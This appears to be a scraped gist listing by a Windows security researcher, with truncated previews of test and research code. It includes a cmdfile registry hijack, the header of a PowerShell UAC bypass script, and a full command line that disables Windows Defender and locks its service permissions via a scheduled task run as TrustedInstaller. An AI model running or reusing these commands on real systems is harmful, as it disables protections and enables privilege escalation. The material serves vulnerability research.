James Forshaw tyranid

View Test for MS14-027
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
int wmain(int argc, WCHAR* argv[])
{
if (argc < 2)
{
printf("Usage: ImpersonateSHExec filename [sessionid]\n");
return 1;
tyranid / cmdfile registration
Created May 22, 2014
A registry file for cmdfile registration
View cmdfile registration
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command]
@="c:\\windows\\system32\\calc.exe"
tyranid / ntfs_testcase.cpp
Created Jun 2, 2014
Test Case for Illegal NTFS Names
View ntfs_testcase.cpp
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <string>
int _tmain(int argc, _TCHAR* argv[])
{
for (int i = 1; i < 128; ++i)
{
std::wstring name = L".\a";
View bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
View kill_file_locker.ps1
Import-Module NtObjectManager
<#
Function to kill all processes which are using a locked file.
#>
function Kill-FileLocker {
param(
[Parameter(Mandatory)]
[string]$Path
)
tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')